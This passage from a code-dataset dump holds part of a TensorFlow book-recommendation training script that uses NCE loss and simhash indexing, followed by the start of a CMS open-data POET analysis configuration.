cells[5]!='null':\n mark_data = dict(json.loads(cells[5]))\n for key in mark_data.keys():\n score = mark_data[key]\n if score > 0 and len(key)>0 and key.lower() not in t:\n t.append(key.lower())\n bookmarks.append(key.lower())\n searchs.append(t)\n cells[2] = cells[2].replace(\"\\\\N\", \"\").replace(\"''\", '').split(\",\");\n # bookids.append([bookid for bookid in cells[2] if len(bookid.strip()) > 0])\n book_cc_words = [book_cc.split(\":\") for book_cc in cells[2]]\n # book_cc_words = [[book_cc,10] for book_cc in books.split(\",\")]\n bids = []\n if len(book_cc_words) > 1:\n bids = [book_cc[0] for book_cc in book_cc_words]\n bookids.append(bids)\n packages.append(cells[3])\n assert len(guids)==len(searchs) and len(searchs)==len(bookids) and len(packages)==len(packages)\n return np.array(guids),np.array(searchs),np.array(bookids),np.array(packages),np.array(booktags),np.array(bookmarks)\n\ndef reSort(searchs,bookids,packages,booktags,bookmarks):\n rows = len(searchs)\n indexs = np.random.permutation(rows).tolist()\n 
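# Editor's note (hedged; not in the original record): np.random.permutation(rows)\n    # above yields one shared shuffle order, and reusing the same indexs list for\n    # every parallel array on the next line keeps row i of searchs aligned with\n    # row i of bookids, packages, booktags and bookmarks after the shuffle.\n    # A tiny worked example of this fancy-indexing shuffle:\n    #   np.array([10, 20, 30])[[2, 0, 1]]  ->  array([30, 10, 20])\n    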
return searchs[indexs],bookids[indexs], packages[indexs],booktags[indexs],bookmarks[indexs]\n\ndef getDataSet(datas, trainrate):\n rows = len(datas)\n split_index = int(rows * trainrate)\n train = datas[:split_index]\n test = datas[split_index:]\n return train, test\n\ndef build_dictionary(items, n_items):\n \"\"\"Process raw inputs into a dataset.\"\"\"\n count = [['UNK', -1]]\n count.extend(collections.Counter(items).most_common(n_items - 1))\n dictionary = dict()\n for item, _ in count:\n dictionary[item] = len(dictionary)\n unk_count = 0\n for item in items:\n if item not in dictionary:\n unk_count += 1\n count[0][1] = unk_count\n reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n return dictionary,reversed_dictionary\n\ndef build_dataset(datas,maxItemCount):\n dataset = []\n for v in datas:\n for i in range(len(v)):\n index = random.randint(0, len(v) - 1)\n input = v[0:index]\n input = input[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int32)\n for i in range(len(input)):\n zeros[maxItemCount - len(input) + i] = input[i]\n input = zeros.tolist()\n label = v[index]\n dataset.append([input, label])\n return dataset\n\ndef flatten(datas):\n results=[]\n for row in datas:\n for cell in row :\n results.append(cell)\n return results\n\ndef coverString2List(datas):\n datas = datas.split(\"], \")\n data = []\n for i in datas:\n data.append(i.replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))\n return data\n\n\n\nsearchs_dictionary_path=\"searchs_dictionary.txt\"\nbookids_dictionary_path=\"bookids_dictionary.txt\"\npackages_dictionary_path=\"packages_dictionary.txt\"\nsearchs_data_path=\"searchs_data.txt\"\nbookids_data_path=\"bookids_data.txt\"\npackages_data_path=\"packages_data.txt\"\nbooktags_data_path=\"booktags_data.txt\"\nbookmarks_data_path=\"bookmarks_data.txt\"\nsimhash_path=\"simhash_path.txt\"\n\ndef build_dataset():\n if tf.gfile.Exists(FLAGS.buckets + searchs_dictionary_path) :\n print(\"load from cache\")\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_dictionary_path, 'r') as f:\n searchs_dictionary=eval(f.read())\n searchs_reversed_dictionary=dict(zip(searchs_dictionary.values(), searchs_dictionary.keys()))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_dictionary_path, 'r') as f:\n bookids_dictionary=eval(f.read())\n bookids_reversed_dictionary=dict(zip(bookids_dictionary.values(), bookids_dictionary.keys()))\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_dictionary_path, 'r') as f:\n packages_dictionary=eval(f.read())\n packages_reversed_dictionary=dict(zip(packages_dictionary.values(), packages_dictionary.keys()))\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_data_path, 'r') as f:\n searchs_data=coverString2List(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_data_path, 'r') as f:\n bookids_data = coverString2List(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_data_path, 'r') as f:\n packages_data=eval(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + booktags_data_path, 'r') as f:\n booktags_data = coverString2List(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookmarks_data_path, 'r') as f:\n bookmarks_data=eval(f.read())\n else :\n print(\"load from data\")\n guids, searchs, bookids, packages,booktags,bookmarks = read_data(FLAGS.buckets + \"data.txt\")\n searchs_dictionary, searchs_reversed_dictionary = build_dictionary(flatten(searchs), 50000)\n bookids_dictionary, bookids_reversed_dictionary = 
build_dictionary(flatten(bookids), 100000)\n packages_dictionary, packages_reversed_dictionary = build_dictionary(packages, 30)\n\n searchs_data = []\n booktags_data = []\n bookmarks_data = []\n to_num = lambda word: searchs_dictionary.get(word, 0)\n for i in searchs:\n searchs_data.append(list(map(to_num, i)))\n for i in booktags:\n booktags_data.append(list(map(to_num, i)))\n for i in bookmarks:\n bookmarks_data.append(list(map(to_num, i)))\n bookids_data = []\n to_num = lambda word: bookids_dictionary.get(word, 0)\n for i in bookids:\n bookids_data.append(list(map(to_num, i)))\n to_num = lambda word: packages_dictionary.get(word, 0)\n packages_data = list(map(to_num, packages))\n\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_dictionary_path, 'w') as f:\n f.write(str(searchs_dictionary))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_dictionary_path, 'w') as f:\n f.write(str(bookids_dictionary))\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_dictionary_path, 'w') as f:\n f.write(str(packages_dictionary))\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_data_path, 'w') as f:\n f.write(str(searchs_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_data_path, 'w') as f:\n f.write(str(bookids_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_data_path, 'w') as f:\n f.write(str(packages_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + booktags_data_path, 'w') as f:\n f.write(str(booktags_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookmarks_data_path, 'w') as f:\n f.write(str(bookmarks_data))\n\n\n searchs_data = np.array(searchs_data)\n bookids_data = np.array(bookids_data)\n packages_data = np.array(packages_data)\n booktags_data = np.array(booktags_data)\n bookmarks_data = np.array(bookmarks_data)\n total_size=len(bookids_data)\n print(\"total_size:\",total_size)\n\n searchs, bookids, packages,booktags,bookmarks = reSort(searchs_data, bookids_data, packages_data,booktags_data,bookmarks_data)\n\n trainrate = 0.9\n train_searchs,test_searchs=getDataSet(searchs,trainrate)\n train_bookids,test_bookids=getDataSet(bookids,trainrate)\n train_packages,test_packages=getDataSet(packages,trainrate)\n train_booktags, test_booktags = getDataSet(booktags, trainrate)\n train_bookmarks, test_bookmarks = getDataSet(bookmarks, trainrate)\n\n datas=dict()\n datas['searchs']=train_searchs\n datas['bookids'] = train_bookids\n datas['packages'] = train_packages\n datas['booktags'] = train_booktags\n datas['bookmarks'] = train_bookmarks\n test_datas=dict()\n test_datas['searchs'] = test_searchs\n test_datas['bookids'] = test_bookids\n test_datas['packages'] = test_packages\n test_datas['booktags'] = test_booktags\n test_datas['bookmarks'] = test_bookmarks\n\n return datas,test_datas\n\ndef generate_batch(datas,maxItemCount,batch_size):\n start = time.time()\n searchs=datas['searchs']\n bookids=datas['bookids']\n packages=datas['packages']\n booktags = datas['booktags']\n bookmarks = datas['bookmarks']\n rows = len(bookids)\n indexs = np.random.randint(0, rows, size=(batch_size))\n searchs = searchs[indexs]\n bookids = bookids[indexs]\n packages = packages[indexs]\n booktags = booktags[indexs]\n bookmarks = bookmarks[indexs]\n batch_search = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_bookid = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_booktag = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_bookmark = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_package = np.zeros(shape=(batch_size), dtype=np.int64)\n 
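# Editor's sketch (hypothetical helper; not in the original record): every padding\n    # loop further down left-pads the tail of a variable-length id list into a fixed\n    # window of maxItemCount slots; the repeated logic is equivalent to:\n    def _left_pad(seq, width):\n        # Keep the last width ids and zero-fill on the left.\n        padded = np.zeros(width, dtype=np.int64)\n        tail = seq[-width:]\n        padded[width - len(tail):] = tail\n        return padded\n    # A hedged observation: the searchs/booktags/bookmarks loops below assign with\n    # batch_search[i], batch_booktag[i] and batch_bookmark[i], where i is the inner\n    # padding index; indexing with j, the row index, looks intended.\n    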
batch_label = np.zeros(shape=(batch_size, 1), dtype=np.int64)\n for j in range(len(bookids)):\n v=bookids[j]\n lenv = len(v)-1\n if lenv==0 :\n lenv=1\n index = random.randint(0, lenv)\n input = v[0:index]\n input = input[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n zeros[maxItemCount - len(input) + i] = input[i]\n input = zeros\n batch_label[j] = v[index]\n batch_bookid[j] = input\n for j in range(len(searchs)):\n v = searchs[j]\n random.shuffle(v)\n input = v[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n num=input[i]\n if len(str(num))==0 :\n num=0\n zeros[maxItemCount - len(input) + i] = num\n input = zeros\n batch_search[i] = input\n for j in range(len(booktags)):\n v = booktags[j]\n random.shuffle(v)\n input = v[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n num=input[i]\n if len(str(num))==0 :\n num=0\n zeros[maxItemCount - len(input) + i] = num\n input = zeros\n batch_booktag[i] = input\n for j in range(len(bookmarks)):\n v = bookmarks[j]\n random.shuffle(v)\n input = v[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n num=input[i]\n if len(str(num))==0 :\n num=0\n zeros[maxItemCount - len(input) + i] = num\n input = zeros\n batch_bookmark[i] = input\n for i in range(len(packages)) :\n batch_package[i] = packages[i]\n # print(time.time() - start)\n return batch_search,batch_bookid,batch_package,batch_label,batch_booktag,batch_bookmark\n\ndef weight_variable(shape):\n return tf.Variable(tf.truncated_normal(shape,stddev=1.0 / math.sqrt(shape[1])))\n\ndef bias_variable(shape):\n return tf.Variable(tf.zeros(shape))\n\ndef train(datas,test_datas,\n book_size,search_size,package_size,\n book_embedding_size,search_embedding_size,package_embedding_size,\n batch_size,num_sampled=64):\n graph = tf.Graph()\n with graph.as_default():\n\n # Input data.\n bookids = tf.placeholder(tf.int64, shape=[None,None],name=\"bookids\")\n searchs = tf.placeholder(tf.int64, shape=[None, None],name=\"searchs\")\n booktags = tf.placeholder(tf.int64, shape=[None, None], name=\"booktags\")\n bookmarks = tf.placeholder(tf.int64, shape=[None, None], name=\"bookmarks\")\n packages = tf.placeholder(tf.int64, shape=[None],name=\"packages\")\n labels = tf.placeholder(tf.int64, shape=[None, 1],name=\"labels\")\n\n with tf.device('/cpu:0'):\n with tf.name_scope(\"embeddings\"):\n book_embeddings = tf.Variable(tf.random_uniform([book_size, book_embedding_size], -1.0, 1.0),name=\"book_embeddings\")\n search_embeddings = tf.Variable(tf.random_uniform([search_size, search_embedding_size], -1.0, 1.0),name=\"search_embeddings\")\n package_embeddings = tf.Variable(tf.random_uniform([package_size, package_embedding_size], -1.0, 1.0),name=\"package_embeddings\")\n tf.summary.histogram(\"book_embeddings\", book_embeddings)\n tf.summary.histogram(\"search_embeddings\", search_embeddings)\n tf.summary.histogram(\"package_embeddings\", package_embeddings)\n book_embed = tf.nn.embedding_lookup(book_embeddings, bookids)\n search_embed = tf.nn.embedding_lookup(search_embeddings, searchs)\n booktag_embed = tf.nn.embedding_lookup(search_embeddings, booktags)\n bookmark_embed = tf.nn.embedding_lookup(search_embeddings, bookmarks)\n package_embed = tf.nn.embedding_lookup(package_embeddings, 
packages)\n\n book_embeddings_sum = tf.reduce_sum(book_embeddings)\n\n average_book_embed = tf.reduce_mean(book_embed, 1)\n average_search_embed = tf.reduce_mean(search_embed, 1)\n average_booktag_embed = tf.reduce_mean(booktag_embed, 1)\n average_bookmark_embed = tf.reduce_mean(bookmark_embed, 1)\n\n input_data = tf.concat([average_book_embed,average_search_embed,package_embed,average_booktag_embed,average_bookmark_embed],1)\n\n with tf.name_scope(\"layer1\"):\n W = weight_variable([book_embedding_size + search_embedding_size * 3 + package_embedding_size, 1024])\n b = bias_variable([1024])\n tf.summary.histogram(\"W\", W)\n tf.summary.histogram(\"b\", b)\n layer = tf.matmul(input_data, W) + b\n tf.summary.histogram(\"layer\", layer)\n activations = tf.nn.relu(tf.layers.batch_normalization(layer))\n tf.summary.histogram(\"activations\", activations)\n\n with tf.name_scope(\"layer2\"):\n W = weight_variable([1024, 512])\n b = bias_variable([512])\n tf.summary.histogram(\"W\", W)\n tf.summary.histogram(\"b\", b)\n layer = tf.matmul(layer, W) + b\n tf.summary.histogram(\"layer\", layer)\n activations = tf.nn.relu(tf.layers.batch_normalization(layer))\n tf.summary.histogram(\"activations\", activations)\n\n with tf.name_scope(\"layer3\"):\n W = weight_variable([512, book_embedding_size])\n b = bias_variable([book_embedding_size])\n tf.summary.histogram(\"W\", W)\n tf.summary.histogram(\"b\", b)\n layer = tf.matmul(layer, W) + b\n tf.summary.histogram(\"layer\", layer)\n userVec = tf.nn.relu(tf.layers.batch_normalization(layer),name=\"userVec\")\n tf.summary.histogram(\"activations\", activations)\n\n # Construct the variables for the NCE loss\n with tf.device('/cpu:0'):\n with tf.name_scope(\"nce\"):\n nce_weights = tf.Variable(\n tf.truncated_normal([book_size, book_embedding_size],\n stddev=1.0 / math.sqrt(book_embedding_size)),name=\"nce_weights\")\n nce_biases = tf.Variable(tf.zeros([book_size]),name=\"nce_biases\")\n tf.summary.histogram(\"nce_weights\",nce_weights)\n tf.summary.histogram(\"nce_biases\", nce_biases)\n\n # Compute the average NCE loss for the batch.\n # tf.nce_loss automatically draws a new sample of the negative labels each\n # time we evaluate the loss.\n loss = tf.reduce_mean(\n tf.nn.nce_loss(weights=nce_weights,\n biases=nce_biases,\n labels=labels,\n inputs=userVec,\n num_sampled=num_sampled,\n num_classes=book_size))\n\n tf.summary.scalar('loss', loss)\n # Construct the SGD optimizer using a learning rate of 1.0.\n optimizer = tf.train.GradientDescentOptimizer(rate).minimize(loss)\n\n logits = tf.matmul(userVec, tf.transpose(nce_weights))\n logits = tf.nn.bias_add(logits, nce_biases,name=\"logits\")\n correct_prediction = tf.equal(tf.argmax(logits, 1), tf.squeeze(labels))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n tf.summary.scalar('accuracy', accuracy)\n # labels_one_hot = tf.one_hot(tf.squeeze(labels), book_size)\n # total_loss = tf.nn.sigmoid_cross_entropy_with_logits(\n # labels=labels_one_hot,\n # logits=logits)\n # total_loss = tf.reduce_sum(total_loss)\n total_loss = loss\n\n tf.summary.scalar('total_loss', total_loss)\n top_5 = tf.nn.in_top_k(logits,tf.squeeze(labels),5)\n top_5_accuracy = tf.reduce_mean(tf.cast(top_5, \"float\"))\n tf.summary.scalar('top_5_accuracy', top_5_accuracy)\n top_100 = tf.nn.in_top_k(logits, tf.squeeze(labels), 100)\n top_100_accuracy = tf.reduce_mean(tf.cast(top_100, \"float\"))\n tf.summary.scalar('top_100_accuracy', top_100_accuracy)\n\n # norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, 
keep_dims=True))\n # normalized_embeddings = embeddings / norm\n # similarity = tf.matmul(userVec, normalized_embeddings, transpose_b=True)\n #\n # logits_vec = tf.nn.embedding_lookup(normalized_embeddings,tf.argmax(logits, 1))\n #\n # sims = tf.reduce_mean(tf.reduce_sum(tf.multiply(userVec,logits_vec),axis=1))\n merged = tf.summary.merge_all()\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n # Step 5: Begin training.\n num_steps = 200001\n with tf.Session(graph=graph) as session:\n init.run()\n print('Initialized')\n #加载训练过的模型接着训练\n # ckpt = tf.train.get_checkpoint_state(FLAGS.checkpointDir)\n # if ckpt and ckpt.model_checkpoint_path:\n # print('restore %s' % ckpt.model_checkpoint_path)\n # saver.restore(session, ckpt.model_checkpoint_path)\n\n train_writer = tf.summary.FileWriter(FLAGS.summaryDir + 'train_'+version,session.graph)\n average_loss = 0\n for step in range(num_steps):\n batch_search, batch_bookid, batch_packages, batch_labels,batch_booktags,batch_bookmarks = generate_batch(datas,30, batch_size)\n feed_dict = {bookids: batch_bookid,searchs: batch_search,packages: batch_packages, labels: batch_labels,booktags:batch_booktags,bookmarks:batch_bookmarks}\n _, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)\n average_loss += loss_val\n if step % 1000 == 0:\n if step > 0:\n average_loss /= 1000\n print(\"book_embeddings_sum\",book_embeddings_sum.eval())\n test_batch_search, test_batch_bookid, test_batch_package, test_batch_labels,test_batch_booktags,test_batch_bookmarks = generate_batch(test_datas,30,batch_size)\n test_feed_dict = {bookids: test_batch_bookid,searchs: test_batch_search,packages: test_batch_package, labels: test_batch_labels,booktags:test_batch_booktags,bookmarks:test_batch_bookmarks}\n print(time.strftime('%Y%m%d %H:%M:%S',time.localtime(time.time()))+' Train Average loss at step ', step, ': ', average_loss,\"accuracy:\",accuracy.eval(feed_dict)\n ,\"total_loss:\",total_loss.eval(feed_dict)\n , \"top5\",top_5_accuracy.eval(feed_dict),\"top100\",top_100_accuracy.eval(feed_dict))\n summary = merged.eval(feed_dict)\n train_writer.add_summary(summary, step)\n # print(\"Test test_accuracy\",accuracy.eval(test_feed_dict),\"test_total_loss:\", total_loss.eval(test_feed_dict)\n # , \"top5\",top_5_accuracy.eval(test_feed_dict),\"top100\",top_100_accuracy.eval(test_feed_dict))\n average_loss = 0\n if step > 1 and step % 10000 == 0:\n #保存模型\n saver.save(session, FLAGS.checkpointDir + 'model.ckpt', global_step=step + 1)\n\n return nce_weights.eval()\n\ndef vec2Features(vec):\n return dict(zip([str(h) for h in range(len(vec))], vec))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--buckets', type=str, default='/Users/liuyang/ml/data/userlogv3/',\n help='input data path')\n parser.add_argument('--summaryDir', type=str, default='/Users/liuyang/ml/data/userlogv3/',\n help='input data path')\n parser.add_argument('--checkpointDir', type=str, default='/tmp/userlogv3/',\n help='checkpoint data path')\n parser.add_argument('--eval', type=str, default=False,\n help='is eval')\n parser.add_argument('--evalInputs', type=str, default=\"1,2,3\",\n help='evalInputs')\n FLAGS, _ = parser.parse_known_args()\n\n batch_size = 512\n num_sampled = 128\n\n datas, test_datas=build_dataset()\n\n # print(len(datas['searchs']), datas['searchs'][:10])\n # print(len(datas['bookids']), datas['bookids'][:10])\n # print(len(datas['packages']), datas['packages'][:10])\n\n # a = [0.01,0.008,0.005,0.003,0.001,0.0001]\n # for i in 
a:\n # rate = i\n # version = \"rate_%s\" % rate\n # print(\"reversion:\"+version)\n bookVecs=train(datas,test_datas,\n 100000, 100000, 30,\n 256, 256, 8,\n batch_size, num_sampled)\n\n simHashs = []\n t = time.time()\n for i in range(len(bookVecs)):\n bookVec = bookVecs[i]\n simHashs.append(Simhash(vec2Features(bookVec), f=32).value)\n # simHashindex.add(str(i),)\n if i % 1000 == 0:\n print(\"build simIndex : %s , time:%s\" % (i / len(bookVecs), time.time() - t))\n t = time.time()\n with tf.gfile.FastGFile(FLAGS.summaryDir + simhash_path, 'w') as f:\n f.write(\",\".join(simHashs))\n\n\n","sub_path":"huaben/bookrecommend/ItemMatchV2.py","file_name":"ItemMatchV2.py","file_ext":"py","file_size_in_byte":25491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"237866530","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\nimport FWCore.PythonUtilities.LumiList as LumiList\nimport FWCore.ParameterSet.Types as CfgTypes\nimport os \n\nrelBase = os.environ['CMSSW_BASE']\n\n\n#Work with data (if False, assumed MC simulations)\n#This needs to be in agreement with the input files/datasets below.\nisData = True\ndoPat = False\n\nprocess = cms.Process(\"POET\")\n\n#Configure the framework messaging system\n#https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideMessageLogger\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = \"WARNING\"\nprocess.MessageLogger.categories.append(\"POET\")\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(\n limit=cms.untracked.int32(-1))\nprocess.options = cms.untracked.PSet(wantSummary=cms.untracked.bool(True))\n\n#Select the maximum number of events to process (if -1, run over all events)\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\n\n#Load needed configuration\nprocess.load(\"Configuration.Geometry.GeometryIdeal_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\n\n#Define the source files to be read using the xrootd protocol (root://), or local files (file:)\n#Several files can be comma-separated\n#A local file, for testing, can be downloaded using, e.g., the cern open data client (https://cernopendata-client.readthedocs.io/en/latest/):\n# python cernopendata-client download-files --recid 6004 --filter-range 1-1\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n #'root://eospublic.cern.ch//eos/opendata/cms/Run2012B/DoubleMuParked/AOD/22Jan2013-v1/10000/1EC938EF-ABEC-E211-94E0-90E6BA442F24.root'\n #'file:/playground/1EC938EF-ABEC-E211-94E0-90E6BA442F24.root'\n 'root://eospublic.cern.ch//eos/opendata/cms/MonteCarlo2012/Summer12_DR53X/TTbar_8TeV-Madspin_aMCatNLO-herwig/AODSIM/PU_S10_START53_V19-v2/00000/000A9D3F-CE4C-E311-84F8-001E673969D2.root' \n )\n)\n\n#Alternatively, to run on larger scale, one could use index files as obtained from the Cern Open Data Portal\n#files = 
FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_10000_file_index.txt\")\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_20000_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_20001_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_20002_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_210000_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_30000_file_index.txt\"))\n#files.extend(FileUtils.loadListFromFile(\"data/CMS_Run2012B_DoubleMuParked_AOD_22Jan2013-v1_310000_file_index.txt\"))\n#process.source = cms.Source(\n# \"PoolSource\", fileNames=cms.untracked.vstring(*files))\n\n\n\n#These two lines are needed if you require access to the conditions database. E.g., to get jet energy corrections, trigger prescales, etc.\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nprocess.load('Configuration.StandardSequences.Services_cff')\n#Uncomment and arrange a line like this if you are getting access to the conditions database through CVMFS snapshot files (requires installing CVMFS client)\n#process.GlobalTag.connect = cms.string('sqlite_file:/cvmfs/cms-opendata-conddb.cern.ch/FT_53_LV5_AN1_RUNA.db')\n#The global tag must correspond to the needed epoch (comment out if no conditions needed)\nif isData: process.GlobalTag.globaltag = 'FT53_V21A_AN6::All'\nelse: process.GlobalTag.globaltag = \"START53_V27::All\"\n\nif isData:\n\t# Apply JSON file with lumi mask for data quality purposes (needs to be done after the process.source definition)\n\tgoodJSON = \"data/Cert_190456-208686_8TeV_22Jan2013ReReco_Collisions12_JSON.txt\"\n\tmyLumis = LumiList.LumiList(filename=goodJSON).getCMSSWString().split(\",\")\n\tprocess.source.lumisToProcess = CfgTypes.untracked(\n\t \tCfgTypes.VLuminosityBlockRange())\n\tprocess.source.lumisToProcess.extend(myLumis)\n\n\n#More information about InputCollections at https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideRecoDataTable\nprocess.myevents = cms.EDAnalyzer('EventAnalyzer')\t \nprocess.myelectrons = cms.EDAnalyzer('ElectronAnalyzer',\n\t\t\t\t InputCollection = cms.InputTag(\"gsfElectrons\")\n\t\t\t\t )\nprocess.mymuons = cms.EDAnalyzer('MuonAnalyzer',\n\t\t\t\t InputCollection = cms.InputTag(\"muons\")\n\t\t\t\t )\nprocess.myphotons = cms.EDAnalyzer('PhotonAnalyzer',\n InputCollection = cms.InputTag(\"photons\")\n )\n#Path Strings: These correspond to the Global Tag. 
Run jec_cfg.py first to get .txt files\nJecString = 'START53_V27_'\nif isData: JecString = 'FT53_V21A_AN6_'\n\nif doPat:\n # Load PAT configs and build some light sequences\n process.load('PhysicsTools.PatAlgos.producersLayer1.jetProducer_cff')\n process.load('PhysicsTools.PatAlgos.producersLayer1.metProducer_cff')\n process.load('PhysicsTools.PatAlgos.selectionLayer1.jetSelector_cfi')\n process.patCandidates = cms.Sequence(process.makePatJets+process.makePatMETs)\n process.selectedPatCandidates = cms.Sequence(process.selectedPatJets)\n process.patDefaultSequence = cms.Sequence(process.patCandidates * process.selectedPatCandidates)\n process.load('RecoJets.Configuration.RecoPFJets_cff')\n from PhysicsTools.PatAlgos.tools.jetTools import addJetCollection, runBTagging\n from PhysicsTools.PatAlgos.tools.coreTools import runOnData\n jetcorrlabels = ['L1FastJet','L2Relative','L3Absolute']\n if isData:\n runOnData(process, ['Jets','METs'], \"\", None, [])\n jetcorrlabels.append('L2L3Residual')\n # Set up the new jet collection\n process.ak5PFJets.doAreaFastjet = True\n addJetCollection(process,cms.InputTag('ak5PFJets'),\n \t'AK5', 'PFCorr',\n \tdoJTA = True,\n\tdoBTagging = True,\n\tjetCorrLabel = ('AK5PF', cms.vstring(jetcorrlabels)),\n\tdoType1MET = True,\n\tdoL1Cleaning = False,\n\tdoL1Counters = False,\n\tdoJetID = True,\n\tjetIdLabel = \"ak5\",\n\t) \n \n process.myjets= cms.EDAnalyzer('PatJetAnalyzer',\n\t\t\t\t InputCollection = cms.InputTag(\"selectedPatJetsAK5PFCorr\"),\n isData = cms.bool(isData),\n jecUncName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'Uncertainty_AK5PF.txt'), \n jerResName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/JetResolutionInputAK5PF.txt') \n )\nelse:\n from PhysicsTools.JetMCAlgos.HadronAndPartonSelector_cfi import selectedHadronsAndPartons\n process.selectedHadronsAndPartons = selectedHadronsAndPartons.clone()\n from PhysicsTools.JetMCAlgos.AK5PFJetsMCFlavourInfos_cfi import ak5JetFlavourInfos\n process.jetFlavourInfosAK5PFJets = ak5JetFlavourInfos.clone()\n process.myjets= cms.EDAnalyzer('JetAnalyzer',\n InputCollection = cms.InputTag(\"ak5PFJets\"),\n isData = cms.bool(isData),\n jecL1Name = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L1FastJet_AK5PF.txt'), \n jecL2Name = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L2Relative_AK5PF.txt'), #Don't forget to run jec_cfg.py\n jecL3Name = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L3Absolute_AK5PF.txt'), #to get these .txt files :)\n jecResName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'L2L3Residual_AK5PF.txt'),\n jecUncName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/'+JecString+'Uncertainty_AK5PF.txt'),\n jerResName = cms.FileInPath('PhysObjectExtractorTool/PhysObjectExtractor/JEC/JetResolutionInputAK5PF.txt')\n )\n\nprocess.mymets= cms.EDAnalyzer('MetAnalyzer',\n InputCollection = cms.InputTag(\"pfMet\")\n )\nprocess.mytaus = cms.EDAnalyzer('TauAnalyzer',\n InputCollection = cms.InputTag(\"hpsPFTauProducer\")\n )\nprocess.mytrigEvent = cms.EDAnalyzer('TriggObjectAnalyzer',\n filterName = cms.string(\"hltSingleJet190Regional\"),\n )\n\nprocess.mypvertex = cms.EDAnalyzer('VertexAnalyzer')\nprocess.mytracks= cms.EDAnalyzer('TrackAnalyzer')\nprocess.mygenparticle= cms.EDAnalyzer('GenParticleAnalyzer',\n\t\t\t#collect particles with specific pdgid:status\n\t\t\t#if 0:0, collect them 
